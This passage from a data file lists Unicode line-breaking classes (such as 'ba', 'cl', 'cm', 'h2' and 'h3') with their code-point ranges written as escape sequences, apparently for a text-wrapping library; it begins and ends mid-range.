d\u09df-\u09e1\u09f0-\u09f1\u09f4-\u09f8\u09fa\u0a05-\u0a0a\u0a0f-\u0a10\u0a13-\u0a28\u0a2a-\u0a30\u0a32-\u0a33\u0a35-\u0a36\u0a38-\u0a39\u0a59-\u0a5c\u0a5e\u0a72-\u0a74\u0a85-\u0a8d\u0a8f-\u0a91\u0a93-\u0aa8\u0aaa-\u0ab0\u0ab2-\u0ab3\u0ab5-\u0ab9\u0abd\u0ad0\u0ae0-\u0ae1\u0af0\u0b05-\u0b0c\u0b0f-\u0b10\u0b13-\u0b28\u0b2a-\u0b30\u0b32-\u0b33\u0b35-\u0b39\u0b3d\u0b5c-\u0b5d\u0b5f-\u0b61\u0b70-\u0b77\u0b83\u0b85-\u0b8a\u0b8e-\u0b90\u0b92-\u0b95\u0b99-\u0b9a\u0b9c\u0b9e-\u0b9f\u0ba3-\u0ba4\u0ba8-\u0baa\u0bae-\u0bb9\u0bd0\u0bf0-\u0bf8\u0bfa\u0c05-\u0c0c\u0c0e-\u0c10\u0c12-\u0c28\u0c2a-\u0c33\u0c35-\u0c39\u0c3d\u0c58-\u0c59\u0c60-\u0c61\u0c78-\u0c7f\u0c85-\u0c8c\u0c8e-\u0c90\u0c92-\u0ca8\u0caa-\u0cb3\u0cb5-\u0cb9\u0cbd\u0cde\u0ce0-\u0ce1\u0cf1-\u0cf2\u0d05-\u0d0c\u0d0e-\u0d10\u0d12-\u0d3a\u0d3d\u0d4e\u0d60-\u0d61\u0d70-\u0d75\u0d7a-\u0d7f\u0d85-\u0d96\u0d9a-\u0db1\u0db3-\u0dbb\u0dbd\u0dc0-\u0dc6\u0df4\u0e4f\u0f00\u0f05\u0f13\u0f15-\u0f17\u0f1a-\u0f1f\u0f2a-\u0f33\u0f36\u0f38\u0f40-\u0f47\u0f49-\u0f6c\u0f88-\u0f8c\u0fc0-\u0fc5\u0fc7-\u0fcc\u0fce-\u0fcf\u0fd4-\u0fd8\u104c-\u104f\u10a0-\u10c5\u10c7\u10cd\u10d0-\u10ff\u1200-\u1248\u124a-\u124d\u1250-\u1256\u1258\u125a-\u125d\u1260-\u1288\u128a-\u128d\u1290-\u12b0\u12b2-\u12b5\u12b8-\u12be\u12c0\u12c2-\u12c5\u12c8-\u12d6\u12d8-\u1310\u1312-\u1315\u1318-\u135a\u1360\u1362-\u137c\u1380-\u1399\u13a0-\u13f4\u1401-\u167f\u1681-\u169a\u16a0-\u16ea\u16ee-\u16f0\u1700-\u170c\u170e-\u1711\u1720-\u1731\u1740-\u1751\u1760-\u176c\u176e-\u1770\u17d9\u17f0-\u17f9\u1800-\u1801\u1807\u180a\u1820-\u1877\u1880-\u18a8\u18aa\u18b0-\u18f5\u1900-\u191c\u1940\u19e0-\u1a16\u1a1e-\u1a1f\u1b05-\u1b33\u1b45-\u1b4b\u1b5c\u1b61-\u1b6a\u1b74-\u1b7c\u1b83-\u1ba0\u1bae-\u1baf\u1bba-\u1be5\u1bfc-\u1c23\u1c4d-\u1c4f\u1c5a-\u1c7d\u1cc0-\u1cc7\u1cd3\u1ce9-\u1cec\u1cee-\u1cf1\u1cf5-\u1cf6\u1d00-\u1dbf\u1e00-\u1f15\u1f18-\u1f1d\u1f20-\u1f45\u1f48-\u1f4d\u1f50-\u1f57\u1f59\u1f5b\u1f5d\u1f5f-\u1f7d\u1f80-\u1fb4\u1fb6-\u1fc4\u1fc6-\u1fd3\u1fd6-\u1fdb\u1fdd-\u1fef\u1ff2-\u1ff4\u1ff6-\u1ffc\u1ffe\u2017\u2022-\u2023\u2038\u203e-\u2043\u204a-\u2055\u2057\u205c\u2061-\u2064\u2070-\u2071\u2075-\u207c\u2080\u2085-\u208c\u2090-\u209c\u2100-\u2102\u2104\u2106-\u2108\u210a-\u2112\u2114-\u2115\u2117-\u2120\u2123-\u212a\u212c-\u2153\u2156-\u215a\u215c-\u215d\u215f\u216c-\u216f\u217a-\u2188\u219a-\u21d1\u21d3\u21d5-\u21ff\u2201\u2204-\u2206\u2209-\u220a\u220c-\u220e\u2210\u2214\u2216-\u2219\u221b-\u221c\u2221-\u2222\u2224\u2226\u222d\u222f-\u2233\u2238-\u223b\u223e-\u2247\u2249-\u224b\u224d-\u2251\u2253-\u225f\u2262-\u2263\u2268-\u2269\u226c-\u226d\u2270-\u2281\u2284-\u2285\u2288-\u2294\u2296-\u2298\u229a-\u22a4\u22a6-\u22be\u22c0-\u2311\u2313-\u2328\u232b-\u23f3\u2400-\u2426\u2440-\u244a\u24ff\u254c-\u254f\u2575-\u257f\u2590-\u2591\u2596-\u25
9f\u25a2\u25aa-\u25b1\u25b4-\u25b5\u25b8-\u25bb\u25be-\u25bf\u25c2-\u25c5\u25c9-\u25ca\u25cc-\u25cd\u25d2-\u25e1\u25e6-\u25ee\u25f0-\u2604\u2607-\u2608\u260a-\u260d\u2610-\u2613\u2618-\u261b\u261d\u261f-\u263f\u2641\u2643-\u265f\u2662\u2666\u266b\u266e\u2670-\u269d\u26a0-\u26bd\u26c0-\u26c3\u26ce\u26e2\u26e4-\u26e7\u2701-\u2756\u2758-\u275a\u275f-\u2761\u2764-\u2767\u2794-\u27c4\u27c7-\u27e5\u27f0-\u2982\u2999-\u29d7\u29dc-\u29fb\u29fe-\u2b4c\u2b50-\u2b54\u2c00-\u2c2e\u2c30-\u2c5e\u2c60-\u2cee\u2cf2-\u2cf3\u2cfd\u2d00-\u2d25\u2d27\u2d2d\u2d30-\u2d67\u2d6f\u2d80-\u2d96\u2da0-\u2da6\u2da8-\u2dae\u2db0-\u2db6\u2db8-\u2dbe\u2dc0-\u2dc6\u2dc8-\u2dce\u2dd0-\u2dd6\u2dd8-\u2dde\u2e16\u2e1a-\u2e1b\u2e1e-\u2e1f\u2e2f\u2e32\u2e35-\u2e39\u4dc0-\u4dff\ua4d0-\ua4fd\ua500-\ua60c\ua610-\ua61f\ua62a-\ua62b\ua640-\ua66e\ua673\ua67e-\ua697\ua6a0-\ua6ef\ua6f2\ua700-\ua78e\ua790-\ua793\ua7a0-\ua7aa\ua7f8-\ua801\ua803-\ua805\ua807-\ua80a\ua80c-\ua822\ua828-\ua82b\ua830-\ua837\ua839\ua840-\ua873\ua882-\ua8b3\ua8f2-\ua8fb\ua90a-\ua925\ua930-\ua946\ua95f\ua984-\ua9b2\ua9c1-\ua9c6\ua9ca-\ua9cd\ua9cf\ua9de-\ua9df\uaa00-\uaa28\uaa40-\uaa42\uaa44-\uaa4b\uaa5c\uaae0-\uaaea\uaaf2-\uaaf4\uab01-\uab06\uab09-\uab0e\uab11-\uab16\uab20-\uab26\uab28-\uab2e\uabc0-\uabe2\ufb00-\ufb06\ufb13-\ufb17\ufb29\ufb50-\ufbc1\ufbd3-\ufd3d\ufd50-\ufd8f\ufd92-\ufdc7\ufdf0-\ufdfb\ufdfd\ufe70-\ufe74\ufe76-\ufefc\uff66\uff71-\uff9d\uffa0-\uffbe\uffc2-\uffc7\uffca-\uffcf\uffd2-\uffd7\uffda-\uffdc\uffe8-\uffee\U00010000-\U0001000b\U0001000d-\U00010026\U00010028-\U0001003a\U0001003c-\U0001003d\U0001003f-\U0001004d\U00010050-\U0001005d\U00010080-\U000100fa\U00010107-\U00010133\U00010137-\U0001018a\U00010190-\U0001019b\U000101d0-\U000101fc\U00010280-\U0001029c\U000102a0-\U000102d0\U00010300-\U0001031e\U00010320-\U00010323\U00010330-\U0001034a\U00010380-\U0001039d\U000103a0-\U000103c3\U000103c8-\U000103cf\U000103d1-\U000103d5\U00010400-\U0001049d\U00010800-\U00010805\U00010808\U0001080a-\U00010835\U00010837-\U00010838\U0001083c\U0001083f-\U00010855\U00010858-\U0001085f\U00010900-\U0001091b\U00010920-\U00010939\U0001093f\U00010980-\U000109b7\U000109be-\U000109bf\U00010a00\U00010a10-\U00010a13\U00010a15-\U00010a17\U00010a19-\U00010a33\U00010a40-\U00010a47\U00010a58\U00010a60-\U00010a7f\U00010b00-\U00010b35\U00010b40-\U00010b55\U00010b58-\U00010b72\U00010b78-\U00010b7f\U00010c00-\U00010c48\U00010e60-\U00010e7e\U00011003-\U00011037\U00011049-\U0001104d\U00011052-\U00011065\U00011083-\U000110af\U000110bb-\U000110bd\U000110d0-\U000110e8\U00011103-\U00011126\U00011183-\U000111b2\U000111c1-\U000111c4\U000111c7\U00011680-\U000116aa\U00012000-\U0001236e\U00012400-\U00012462\U00013000-\U00013257\U0001325e-\U00013281\U00013283-\U00013285\U0001328a-\U00013378\U0001337c-\U0001342e\U00016800-\U00016a38\U00016f00-\U00016f44\U00016f50\U00016f93-\U00016f9f\U0001d000-\U0001d0f5\U0001d100-\U0001d126\U0001d129-\U0001d164\U0001d16a-\U0001d16c\U0001d183-\U0001d184\U0001d18c-\U0001d1a9\U0001d1ae-\U0001d1dd\U0001d200-\U0001d241\U0001d245\U0001d300-\U0001d356\U0001d360-\U0001d371\U0001d400-\U0001d454\U0001d456-\U0001d49c\U0001d49e-\U0001d49f\U0001d4a2\U0001d4a5-\U0001d4a6\U0001d4a9-\U0001d4ac\U0001d4ae-\U0001d4b9\U0001d4bb\U0001d4bd-\U0001d4c3\U0001d4c5-\U0001d505\U0001d507-\U0001d50a\U0001d50d-\U0001d514\U0001d516-\U0001d51c\U0001d51e-\U0001d539\U0001d53b-\U0001d53e\U0001d540-\U0001d544\U0001d546\U0001d54a-\U0001d550\U0001d552-\U0001d6a5\U0001d6a8-\U0001d7cb\U0001ee00-\U0001ee03\U0001ee05-\U0001ee1f\U0001ee21-\U0001ee22\U0001ee24\U0001ee27\U0001ee29-\U0001ee32\U0001ee34-\U00
01ee37\U0001ee39\U0001ee3b\U0001ee42\U0001ee47\U0001ee49\U0001ee4b\U0001ee4d-\U0001ee4f\U0001ee51-\U0001ee52\U0001ee54\U0001ee57\U0001ee59\U0001ee5b\U0001ee5d\U0001ee5f\U0001ee61-\U0001ee62\U0001ee64\U0001ee67-\U0001ee6a\U0001ee6c-\U0001ee72\U0001ee74-\U0001ee77\U0001ee79-\U0001ee7c\U0001ee7e\U0001ee80-\U0001ee89\U0001ee8b-\U0001ee9b\U0001eea1-\U0001eea3\U0001eea5-\U0001eea9\U0001eeab-\U0001eebb\U0001eef0-\U0001eef1\U0001f000-\U0001f02b\U0001f030-\U0001f093\U0001f0a0-\U0001f0ae\U0001f0b1-\U0001f0be\U0001f0c1-\U0001f0cf\U0001f0d1-\U0001f0df\U0001f12e\U0001f16a-\U0001f16b\U0001f1e6-\U0001f1ff\U0001f300-\U0001f320\U0001f330-\U0001f335\U0001f337-\U0001f37c\U0001f380-\U0001f393\U0001f3a0-\U0001f3c4\U0001f3c6-\U0001f3ca\U0001f3e0-\U0001f3f0\U0001f400-\U0001f43e\U0001f440\U0001f442-\U0001f4f7\U0001f4f9-\U0001f4fc\U0001f500-\U0001f53d\U0001f540-\U0001f543\U0001f550-\U0001f567\U0001f5fb-\U0001f640\U0001f645-\U0001f64f\U0001f680-\U0001f6c5\U0001f700-\U0001f773",
"b2": "\u2014\u2e3a-\u2e3b",
"ba": "\x09\x5c\x7c\xad\u058a\u05be\u0964-\u0965\u0e5a-\u0e5b\u0f0b\u0f34\u0f7f\u0f85\u0fbe-\u0fbf\u0fd2\u104a-\u104b\u1361\u1400\u1680\u16eb-\u16ed\u1735-\u1736\u17d4-\u17d5\u17d8\u17da\u1804-\u1805\u1b5a-\u1b5b\u1b5d-\u1b60\u1c3b-\u1c3f\u1c7e-\u1c7f\u2000-\u2006\u2008-\u200a\u2010\u2012-\u2013\u2027\u2056\u2058-\u205b\u205d-\u205f\u2cfa-\u2cfc\u2cff\u2d70\u2e0e-\u2e15\u2e17\u2e19\u2e2a-\u2e2d\u2e30-\u2e31\u2e33-\u2e34\ua4fe-\ua4ff\ua60d\ua60f\ua6f3-\ua6f7\ua8ce-\ua8cf\ua92e-\ua92f\ua9c7-\ua9c9\uaa5d-\uaa5f\uaaf0-\uaaf1\uabeb\U00010100-\U00010102\U0001039f\U000103d0\U00010857\U0001091f\U00010a50-\U00010a57\U00010b39-\U00010b3f\U00011047-\U00011048\U000110be-\U000110c1\U00011140-\U00011143\U000111c5-\U000111c6\U000111c8\U00012470-\U00012473",
"bb": "\xb4\u02c8\u02cc\u02df\u0f01-\u0f04\u0f06-\u0f07\u0f09-\u0f0a\u0fd0-\u0fd1\u0fd3\u1806\u1ffd\ua874-\ua875",
"bk": "\x0b-\x0c\u2028-\u2029",
"cb": "\ufffc",
"cj": "\u3041\u3043\u3045\u3047\u3049\u3063\u3083\u3085\u3087\u308e\u3095-\u3096\u30a1\u30a3\u30a5\u30a7\u30a9\u30c3\u30e3\u30e5\u30e7\u30ee\u30f5-\u30f6\u30fc\u31f0-\u31ff\uff67-\uff70",
"cl": "\x7d\u0f3b\u0f3d\u169c\u2046\u207e\u208e\u232a\u2769\u276b\u276d\u276f\u2771\u2773\u2775\u27c6\u27e7\u27e9\u27eb\u27ed\u27ef\u2984\u2986\u2988\u298a\u298c\u298e\u2990\u2992\u2994\u2996\u2998\u29d9\u29db\u29fd\u2e23\u2e25\u2e27\u2e29\u3001-\u3002\u3009\u300b\u300d\u300f\u3011\u3015\u3017\u3019\u301b\u301e-\u301f\ufd3f\ufe11-\ufe12\ufe18\ufe36\ufe38\ufe3a\ufe3c\ufe3e\ufe40\ufe42\ufe44\ufe48\ufe50\ufe52\ufe5a\ufe5c\ufe5e\uff09\uff0c\uff0e\uff3d\uff5d\uff60-\uff61\uff63-\uff64\U0001325b-\U0001325d\U00013282\U00013287\U00013289\U0001337a-\U0001337b",
"cm": "\x00-\x08\x0e-\x1f\x7f-\x84\x86-\x9f\u0300-\u034e\u0350-\u035b\u0363-\u036f\u0483-\u0489\u0591-\u05bd\u05bf\u05c1-\u05c2\u05c4-\u05c5\u05c7\u0610-\u061a\u064b-\u065f\u0670\u06d6-\u06dc\u06df-\u06e4\u06e7-\u06e8\u06ea-\u06ed\u0711\u0730-\u074a\u07a6-\u07b0\u07eb-\u07f3\u0816-\u0819\u081b-\u0823\u0825-\u0827\u0829-\u082d\u0859-\u085b\u08e4-\u08fe\u0900-\u0903\u093a-\u093c\u093e-\u094f\u0951-\u0957\u0962-\u0963\u0981-\u0983\u09bc\u09be-\u09c4\u09c7-\u09c8\u09cb-\u09cd\u09d7\u09e2-\u09e3\u0a01-\u0a03\u0a3c\u0a3e-\u0a42\u0a47-\u0a48\u0a4b-\u0a4d\u0a51\u0a70-\u0a71\u0a75\u0a81-\u0a83\u0abc\u0abe-\u0ac5\u0ac7-\u0ac9\u0acb-\u0acd\u0ae2-\u0ae3\u0b01-\u0b03\u0b3c\u0b3e-\u0b44\u0b47-\u0b48\u0b4b-\u0b4d\u0b56-\u0b57\u0b62-\u0b63\u0b82\u0bbe-\u0bc2\u0bc6-\u0bc8\u0bca-\u0bcd\u0bd7\u0c01-\u0c03\u0c3e-\u0c44\u0c46-\u0c48\u0c4a-\u0c4d\u0c55-\u0c56\u0c62-\u0c63\u0c82-\u0c83\u0cbc\u0cbe-\u0cc4\u0cc6-\u0cc8\u0cca-\u0ccd\u0cd5-\u0cd6\u0ce2-\u0ce3\u0d02-\u0d03\u0d3e-\u0d44\u0d46-\u0d48\u0d4a-\u0d4d\u0d57\u0d62-\u0d63\u0d82-\u0d83\u0dca\u0dcf-\u0dd4\u0dd6\u0dd8-\u0ddf\u0df2-\u0df3\u0f18-\u0f19\u0f35\u0f37\u0f39\u0f3e-\u0f3f\u0f71-\u0f7e\u0f80-\u0f84\u0f86-\u0f87\u0f8d-\u0f97\u0f99-\u0fbc\u0fc6\u135d-\u135f\u1712-\u1714\u1732-\u1734\u1752-\u1753\u1772-\u1773\u180b-\u180d\u18a9\u1920-\u192b\u1930-\u193b\u1a17-\u1a1b\u1a7f\u1b00-\u1b04\u1b34-\u1b44\u1b6b-\u1b73\u1b80-\u1b82\u1ba1-\u1bad\u1be6-\u1bf3\u1c24-\u1c37\u1cd0-\u1cd2\u1cd4-\u1ce8\u1ced\u1cf2-\u1cf4\u1dc0-\u1de6\u1dfc-\u1dff\u200c-\u200f\u202a-\u202e\u206a-\u206f\u20d0-\u20f0\u2cef-\u2cf1\u2d7f\u2de0-\u2dff\u302a-\u302f\u3099-\u309a\ua66f-\ua672\ua674-\ua67d\ua69f\ua6f0-\ua6f1\ua802\ua806\ua80b\ua823-\ua827\ua880-\ua881\ua8b4-\ua8c4\ua8e0-\ua8f1\ua926-\ua92d\ua947-\ua953\ua980-\ua983\ua9b3-\ua9c0\uaa29-\uaa36\uaa43\uaa4c-\uaa4d\uaaeb-\uaaef\uaaf5-\uaaf6\uabe3-\uabea\uabec-\uabed\ufb1e\ufe00-\ufe0f\ufe20-\ufe26\ufff9-\ufffb\U000101fd\U00010a01-\U00010a03\U00010a05-\U00010a06\U00010a0c-\U00010a0f\U00010a38-\U00010a3a\U00010a3f\U00011000-\U00011002\U00011038-\U00011046\U00011080-\U00011082\U000110b0-\U000110ba\U00011100-\U00011102\U00011127-\U00011134\U00011180-\U00011182\U000111b3-\U000111c0\U000116ab-\U000116b7\U00016f51-\U00016f7e\U00016f8f-\U00016f92\U0001d165-\U0001d169\U0001d16d-\U0001d182\U0001d185-\U0001d18b\U0001d1aa-\U0001d1ad\U0001d242-\U0001d244\U000e0001\U000e0020-\U000e007f\U000e0100-\U000e01ef",
"cp": "\x29\x5c\x5d",
"cr": "\x0d",
"ex": "\x21\x3f\u05c6\u061b\u061e-\u061f\u06d4\u07f9\u0f0d-\u0f11\u0f14\u1802-\u1803\u1808-\u1809\u1944-\u1945\u2762-\u2763\u2cf9\u2cfe\u2e2e\ua60e\ua876-\ua877\ufe15-\ufe16\ufe56-\ufe57\uff01\uff1f",
"gl": "\xa0\u034f\u035c-\u0362\u0f08\u0f0c\u0f12\u0fd9-\u0fda\u180e\u2007\u2011\u202f",
"h2": "\uac00\uac1c\uac38\uac54\uac70\uac8c\uaca8\uacc4\uace0\uacfc\uad18\uad34\uad50\uad6c\uad88\uada4\uadc0\uaddc\uadf8\uae14\uae30\uae4c\uae68\uae84\uaea0\uaebc\uaed8\uaef4\uaf10\uaf2c\uaf48\uaf64\uaf80\uaf9c\uafb8\uafd4\uaff0\ub00c\ub028\ub044\ub060\ub07c\ub098\ub0b4\ub0d0\ub0ec\ub108\ub124\ub140\ub15c\ub178\ub194\ub1b0\ub1cc\ub1e8\ub204\ub220\ub23c\ub258\ub274\ub290\ub2ac\ub2c8\ub2e4\ub300\ub31c\ub338\ub354\ub370\ub38c\ub3a8\ub3c4\ub3e0\ub3fc\ub418\ub434\ub450\ub46c\ub488\ub4a4\ub4c0\ub4dc\ub4f8\ub514\ub530\ub54c\ub568\ub584\ub5a0\ub5bc\ub5d8\ub5f4\ub610\ub62c\ub648\ub664\ub680\ub69c\ub6b8\ub6d4\ub6f0\ub70c\ub728\ub744\ub760\ub77c\ub798\ub7b4\ub7d0\ub7ec\ub808\ub824\ub840\ub85c\ub878\ub894\ub8b0\ub8cc\ub8e8\ub904\ub920\ub93c\ub958\ub974\ub990\ub9ac\ub9c8\ub9e4\uba00\uba1c\uba38\uba54\uba70\uba8c\ubaa8\ubac4\ubae0\ubafc\ubb18\ubb34\ubb50\ubb6c\ubb88\ubba4\ubbc0\ubbdc\ubbf8\ubc14\ubc30\ubc4c\ubc68\ubc84\ubca0\ubcbc\ubcd8\ubcf4\ubd10\ubd2c\ubd48\ubd64\ubd80\ubd9c\ubdb8\ubdd4\ubdf0\ube0c\ube28\ube44\ube60\ube7c\ube98\ubeb4\ubed0\ubeec\ubf08\ubf24\ubf40\ubf5c\ubf78\ubf94\ubfb0\ubfcc\ubfe8\uc004\uc020\uc03c\uc058\uc074\uc090\uc0ac\uc0c8\uc0e4\uc100\uc11c\uc138\uc154\uc170\uc18c\uc1a8\uc1c4\uc1e0\uc1fc\uc218\uc234\uc250\uc26c\uc288\uc2a4\uc2c0\uc2dc\uc2f8\uc314\uc330\uc34c\uc368\uc384\uc3a0\uc3bc\uc3d8\uc3f4\uc410\uc42c\uc448\uc464\uc480\uc49c\uc4b8\uc4d4\uc4f0\uc50c\uc528\uc544\uc560\uc57c\uc598\uc5b4\uc5d0\uc5ec\uc608\uc624\uc640\uc65c\uc678\uc694\uc6b0\uc6cc\uc6e8\uc704\uc720\uc73c\uc758\uc774\uc790\uc7ac\uc7c8\uc7e4\uc800\uc81c\uc838\uc854\uc870\uc88c\uc8a8\uc8c4\uc8e0\uc8fc\uc918\uc934\uc950\uc96c\uc988\uc9a4\uc9c0\uc9dc\uc9f8\uca14\uca30\uca4c\uca68\uca84\ucaa0\ucabc\ucad8\ucaf4\ucb10\ucb2c\ucb48\ucb64\ucb80\ucb9c\ucbb8\ucbd4\ucbf0\ucc0c\ucc28\ucc44\ucc60\ucc7c\ucc98\uccb4\uccd0\uccec\ucd08\ucd24\ucd40\ucd5c\ucd78\ucd94\ucdb0\ucdcc\ucde8\uce04\uce20\uce3c\uce58\uce74\uce90\uceac\ucec8\ucee4\ucf00\ucf1c\ucf38\ucf54\ucf70\ucf8c\ucfa8\ucfc4\ucfe0\ucffc\ud018\ud034\ud050\ud06c\ud088\ud0a4\ud0c0\ud0dc\ud0f8\ud114\ud130\ud14c\ud168\ud184\ud1a0\ud1bc\ud1d8\ud1f4\ud210\ud22c\ud248\ud264\ud280\ud29c\ud2b8\ud2d4\ud2f0\ud30c\ud328\ud344\ud360\ud37c\ud398\ud3b4\ud3d0\ud3ec\ud408\ud424\ud440\ud45c\ud478\ud494\ud4b0\ud4cc\ud4e8\ud504\ud520\ud53c\ud558\ud574\ud590\ud5ac\ud5c8\ud5e4\ud600\ud61c\ud638\ud654\ud670\ud68c\ud6a8\ud6c4\ud6e0\ud6fc\ud718\ud734\ud750\ud76c\ud788",
"h3": "\uac01-\uac1b\uac1d-\uac37\uac39-\uac53\uac55-\uac6f\uac71-\uac8b\uac8d-\uaca7\uaca9-\uacc3\uacc5-\uacdf\uace1-\uacfb\uacfd-\uad17\uad19-\uad33\uad35-\uad4f\uad51-\uad6b\uad6d-\uad87\uad89-\uada3\uada5-\uadbf\uadc1-\uaddb\uaddd-\uadf7\uadf9-\uae13\uae15-\uae2f\uae31-\uae4b\uae4d-\uae67\uae69-\uae83\uae85-\uae9f\uaea1-\uaebb\uaebd-\uaed7\uaed9-\uaef3\uaef5-\uaf0f\uaf11-\uaf2b\uaf2d-\uaf47\uaf49-\uaf63\uaf65-\uaf7f\uaf81-\uaf9b\uaf9d-\uafb7\uafb9-\uafd3\uafd5-\uafef\uaff1-\ub00b\ub00d-\ub027\ub029-\ub043\ub045-\ub05f\ub061-\ub07b\ub07d-\ub097\ub099-\ub0b3\ub0b5-\ub0cf\ub0d1-\ub0eb\ub0ed-\ub107\ub109-\ub123\ub125-\ub13f\ub141-\ub15b\ub15d-\ub177\ub179-\ub193\ub195-\ub1af\ub1b1-\ub1cb\ub1cd-\ub1e7\ub1e9-\ub203\ub205-\ub21f\ub221-\ub23b\ub23d-\ub257\ub259-\ub273\ub275-\ub28f\ub291-\ub2ab\ub2ad-\ub2c7\ub2c9-\ub2e3\ub2e5-\ub2ff\ub301-\ub31b\ub31d-\ub337\ub339-\ub353\ub355-\ub36f\ub371-\ub38b\ub38d-\ub3a7\ub3a9-\ub3c3\ub3c5-\ub3df\ub3e1-\ub3fb\ub3fd-\ub417\ub419-\ub433\ub435-\ub44f\ub451-\ub46b\ub46d-\ub487\ub489-\ub4a3\ub4a5-\ub4bf\ub4c1-\ub4db\ub4dd-\ub4f7\ub4f9-\ub513\ub515-\ub52f\ub531-\ub54b\ub54d-\ub567\ub569-\ub583\ub585-\ub59f\ub5a1-\ub5bb\ub5bd-\ub5d7\ub5d9-\ub5f3\ub5f5-\ub60f\ub611-\ub62b\ub62d-\ub647\ub649-\ub663\ub665-\ub67f\ub681-\ub69b\ub69d-\ub6b7\ub6b9-\ub6d3\ub6d5-\ub6ef\ub6f1-\ub70b\ub70d-\ub727\ub729-\ub743\ub745-\ub75f\ub761-\ub77b\ub77d-\ub797\ub799-\ub7b3\ub7b5-\ub7cf\ub7d1-\ub7eb\ub7ed-\ub807\ub809-\ub823\ub825-\ub83f\ub841-\ub85b\ub85d-\ub877\ub879-\ub893\ub895-\ub8af\ub8b1-\ub8cb\ub8cd-\ub8e7\ub8e9-\ub903\ub905-\ub91f\ub921-\ub93b\ub93d-\ub957\ub959-\ub973\ub975-\ub98f\ub991-\ub9ab\ub9ad-\ub9c7\ub9c9-\ub9e3\ub9e5-\ub9ff\uba01-\uba1b\uba1d-\uba37\uba39-\uba53\uba55-\uba6f\uba71-\uba8b\uba8d-\ubaa7\ubaa9-\ubac3\ubac5-\ubadf\ubae1-\ubafb\ubafd-\ubb17\ubb19-\ubb33\ubb35-\ubb4f\ubb51-\ubb6b\ubb6d-\ubb87\ubb89-\ubba3\ubba5-\ubbbf\ubbc1-\ubbdb\ubbdd-\ubbf7\ubbf9-\ubc13\ubc15-\ubc2f\ubc31-\ubc4b\ubc4d-\ubc67\ubc69-\ubc83\ubc85-\ubc9f\ubca1-\ubcbb\ubcbd-\ubcd7\ubcd9-\ubcf3\ubcf5-\ubd0f\ubd11-\ubd2b\ubd2d-\ubd47\ubd49-\ubd63\ubd65-\ubd7f\ubd81-\ubd9b\ubd9d-\ubdb7\ubdb9-\ubdd3\ubdd5-\ubdef\ubdf1-\ube0b\ube0d-\ube27\ube29-\ube43\ube45-\ube5f\ube61-\ube7b\ube7d-\ube97\ube99-\ubeb3\ubeb5-\ubecf\ubed1-\ubeeb\ubeed-\ubf07\ubf09-\ubf23\ubf25-\ubf3f\ubf41-\ubf5b\ubf5d-\ubf77\ubf79-\ubf93\ubf95-\ubfaf\ubfb1-\ubfcb\ubfcd-\ubfe7\ubfe9-\uc003\uc005-\uc01f\uc021-\uc03b\uc03d-\uc057\uc059-\uc073\uc075-\uc08f\uc091-\uc0ab\uc0ad-\uc0c7\uc0c9-\uc0e3\uc0e5-\uc0ff\uc101-\uc11b\uc11d-\uc137\uc139-\uc153\uc155-\uc16f\uc171-\uc18b\uc18d-\uc1a7\uc1a9-\uc1c3\uc1c5-\uc1df\uc1e1-\uc1fb\uc1fd-\uc217\uc219-\uc233\uc235-\uc24f\uc251-\uc26b\uc26d-\uc287\uc289-\uc2a3\uc2a5-\uc2bf\uc2c1-\uc2db\uc2dd-\uc2f7\uc2f9-\uc313\uc315-\uc32f\uc331-\uc34b\uc34d-\uc367\uc369-\uc383\uc385-\uc39f\uc3a1-\uc3bb\uc3bd-\uc3d7\uc3d9-\uc3f3\uc3f5-\uc40f\uc411-\uc42b\uc42d-\uc447\uc449-\uc463\uc465-\uc47f\uc481-\uc49b\uc49d-\uc4b7\uc4b9-\uc4d3\uc4d5-\uc4ef\uc4f1-\uc50b\uc50d-\uc527\uc529-\uc543\uc545-\uc55f\uc561-\uc57b\uc57d-\uc597\uc599-\uc5b3\uc5b5-\uc5cf\uc5d1-\uc5eb\uc5ed-\uc607\uc609-\uc623\uc625-\uc63f\uc641-\uc65b\uc65d-\uc677\uc679-\uc693\uc695-\uc6af\uc6b1-\uc6cb\uc6cd-\uc6e7\uc6e9-\uc703\uc705-\uc71f\uc721-\uc73b\uc73d-\uc757\uc759-\uc773\uc775-\uc78f\uc791-\uc7ab\uc7ad-\uc7c7\uc7c9-\uc7e3\uc7e5-\uc7ff\uc801-\uc81b\uc81d-\uc837\uc839-\uc853\uc855-\uc86f\uc871-\uc88b\uc88d-\uc8a7\uc8a9-\uc8c3\uc8c5-\uc8df\uc8e1-\uc8fb\uc8fd-\uc917\uc919-\uc933\uc935-\uc94f\uc951-\uc96b\uc96d-\uc987\uc989-\uc9a3\uc9a5-\uc9bf\uc9c1-\uc9d
b\uc9dd-\uc9f7\uc9f9-\uca13\uca15-\uca2f\uca31-\uca4b\uca4d-\uca67\uca69-\uca83\uca85-\uca9f\ucaa1-\ucabb\ucabd-\ucad7\ucad9-\ucaf3\ucaf5-\ucb0f\ucb11-\ucb2b\ucb2d-\ucb47\ucb49-\ucb63\ucb65-\ucb7f\ucb81-\ucb9b\ucb9d-\ucbb7\ucbb9-\ucbd3\ucbd5-\ucbef\ucbf1-\ucc0b\ucc0d-\ucc27\ucc29-\ucc43\ucc45-\ucc5f\ucc61-\ucc7b\ucc7d-\ucc97\ucc99-\uccb3\uccb5-\ucccf\uccd1-\ucceb\ucced-\ucd07\ucd09-\ucd23\ucd25-\ucd3f\ucd41-\ucd5b\ucd5d-\ucd77\ucd79-\ucd93\ucd95-\ucdaf\ucdb1-\ucdcb\ucdcd-\ucde7\ucde9-\uce03\uce05-\uce1f\uce21-\uce3b\uce3d-\uce57\uce59-\uce73\uce75-\uce8f\uce91-\uceab\ucead-\ucec7\ucec9-\ucee3\ucee5-\uceff\ucf01-\ucf1b\ucf1d-\ucf37\ucf39-\ucf53\ucf55-\ucf6f\ucf71-\ucf8b\ucf8d-\ucfa7\ucfa9-\ucfc3\ucfc5-\ucfdf\ucfe1-\ucffb\ucffd-\ud017\ud019-\ud033\ud035-\ud04f\ud051-\ud06b\ud06d-\ud087\ud089-\ud0a3\ud0a5-\ud0bf\ud0c1-\ud0db\ud0dd-\ud0f7\ud0f9-\ud113\ud115-\ud12f\ud131-\ud14b\ud14d-\ud167\ud169-\ud183\ud185-\ud19f\ud1a1-\ud1bb\ud1bd-\ud1d7\ud1d9-\ud1f3\ud1f5-\ud20f\ud211-\ud22b\ud22d-\ud247\ud249-\ud263\ud265-\ud27f\ud281-\ud29b\ud29d-\ud2b7\ud2b9-\ud2d3\ud2d5-\ud2ef\ud2f1-\ud30b\ud30d-\ud327\ud329-\ud343\ud345-\ud35f\ud361-\ud37b\ud37d-\ud397\ud399-\ud3b3\ud3b5-\ud3cf\ud3d1-\ud3eb\ud3ed-